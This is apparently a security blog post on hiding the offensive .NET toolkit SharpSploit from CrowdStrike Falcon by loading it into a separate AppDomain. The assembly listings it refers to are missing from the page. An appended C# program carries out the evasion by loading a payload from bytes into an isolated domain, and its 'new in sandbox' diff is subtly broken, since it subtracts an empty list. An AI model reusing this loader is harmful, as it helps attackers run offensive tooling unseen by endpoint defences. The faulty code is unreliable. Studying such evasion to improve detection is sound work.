Hiding from Crowdstrike
Forgive me pappa Ionescu, for I have sinned (I'm sure he understands this far better than I). This doesn't truly and fully escape anything; we're just taking advantage of how something automated, like Crowdstrike's agent, peeks into applications. Even in the following example, I don't have full confidence that Crowdstrike isn't capable of getting our sketchy payload (SharpSploit) or plumbing the depths of the "sandboxed" AppDomain, though it also isn't logging anything suspicious and doesn't seem to be catching new threads or any odd calls (save for opening handles to protected processes from under-protected places). This certainly warrants more of my time to look into.
To start off this under-explained example (that I will surely enrich in the future), here are the Assemblies loaded in the main AppDomain, before I load something sketchy like SharpSploit:
Nothing out of the ordinary; no Crowdstrike sensor or, at least, not yet. I'm not sure if there's some sort of determined delay, if the sensor Assembly is always loaded, if it can even interrogate .NET, or if the act of loading another Assembly, sketchy or not, triggers it. Add it to the TODO list.
Anyways, nothing crazy here; just showing that both the SharpSploit and Crowdstrike Assemblies are now loaded:
Now, this is the point at which I realized that I had removed the example code that creates the new AppDomain and loads the SharpSploit Assembly into it... Add that to the TODO pile. Here's a listing of the Assemblies loaded in this new "sandboxed" AppDomain, before I load SharpSploit into it:
And then here we are after loading our sketchy SharpSploit payload:
Neat. Of course, the lack of a Crowdstrike sensor Assembly doesn't mean I've done anything of value here. Even though it would appear my activity inside this AppDomain is no longer being tracked, according to the Crowdstrike Falcon console, I'm a strong believer in "If you can't fully explain how it works, it's probably not actually working (and you're dumb)". So brb; need to work. Also, if Pappa Ionescu or someone from Crowdstrike sees this: feel free to reach out to me, but this is the extent of my knowledge (stupidity), thus far.
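Since the AppDomain code referenced above is missing from the page, here is an added example of the procedure it describes (list the assemblies in the main AppDomain, create a second AppDomain, load an assembly from bytes into that second domain only, and list both domains again). This is editor-written illustration, not the author's removed code and not SharpSploit's. It assumes .NET Framework (AppDomain.CreateDomain is not available on .NET Core / .NET 5+), and the payload path is a placeholder; any .NET assembly on disk will do for seeing the listings change.

```csharp
using System;
using System.IO;
using System.Linq;
using System.Reflection;

// Instances of this class are created inside the target AppDomain and used from
// the main domain through a proxy (MarshalByRefObject). Only serializable values
// (strings, string arrays) cross the boundary, so the payload assembly itself is
// never handed back to, and therefore never loaded into, the main domain.
public class DomainLoader : MarshalByRefObject
{
    // Load an assembly from raw bytes into the domain this object lives in.
    public string LoadFromBytes(byte[] raw)
    {
        Assembly asm = Assembly.Load(raw);
        return asm.FullName;
    }

    // Simple names of every assembly currently loaded in this object's domain.
    public string[] LoadedAssemblies()
    {
        return AppDomain.CurrentDomain.GetAssemblies()
            .Select(a => a.GetName().Name)
            .OrderBy(n => n)
            .ToArray();
    }
}

class Program
{
    static void Print(string title, string[] names)
    {
        Console.WriteLine("== " + title + " (" + names.Length + ") ==");
        foreach (string n in names) Console.WriteLine("  " + n);
    }

    static void Main(string[] args)
    {
        // Placeholder path (assumption): point this at the assembly you want to test with.
        string payloadPath = args.Length > 0 ? args[0] : @"C:\path\to\SharpSploit.dll";
        byte[] payload = File.ReadAllBytes(payloadPath);

        // 1. Baseline listing for the main AppDomain.
        var main = new DomainLoader();
        string[] mainBefore = main.LoadedAssemblies();
        Print("main domain, before", mainBefore);

        // 2. Second AppDomain. ApplicationBase must let it resolve this executable,
        //    otherwise CreateInstanceAndUnwrap cannot find DomainLoader.
        var setup = new AppDomainSetup { ApplicationBase = AppDomain.CurrentDomain.BaseDirectory };
        AppDomain sandbox = AppDomain.CreateDomain("Sandbox", null, setup);

        // The object is constructed inside the sandbox; we get a transparent proxy back.
        var remote = (DomainLoader)sandbox.CreateInstanceAndUnwrap(
            typeof(DomainLoader).Assembly.FullName,
            typeof(DomainLoader).FullName);

        Print("sandbox, before", remote.LoadedAssemblies());

        // 3. Load the payload in the sandbox only. Assembly.Load(byte[]) runs inside
        //    the sandbox; only the FullName string comes back across the boundary.
        Console.WriteLine("loaded in sandbox: " + remote.LoadFromBytes(payload));

        string[] sandboxAfter = remote.LoadedAssemblies();
        string[] mainAfter = main.LoadedAssemblies();
        Print("sandbox, after", sandboxAfter);
        Print("main domain, after", mainAfter);

        // 4. Show what changed in each domain. The payload (and anything it pulled in)
        //    should appear only in the sandbox diff; the main domain diff should be empty.
        Print("new in main domain", mainAfter.Except(mainBefore).ToArray());
        Print("new in sandbox", sandboxAfter.Except(remote.LoadedAssemblies().Take(0)).ToArray());

        AppDomain.Unload(sandbox);
    }
}
```

Two things worth keeping in mind when reading the listings this produces. First, the listing only shows which managed assemblies are present in a given AppDomain; AppDomains share one process, so anything a sensor does below the CLR (kernel-mode callbacks, user-mode hooks, or the CLR's own ETW assembly-load events from the Microsoft-Windows-DotNETRuntime provider) is unaffected by which domain an assembly lands in. Second, if you return an Assembly or a type from the payload across the proxy instead of a string, the CLR will load the payload into the calling domain to deserialize it, which silently undoes the separation the example is trying to show.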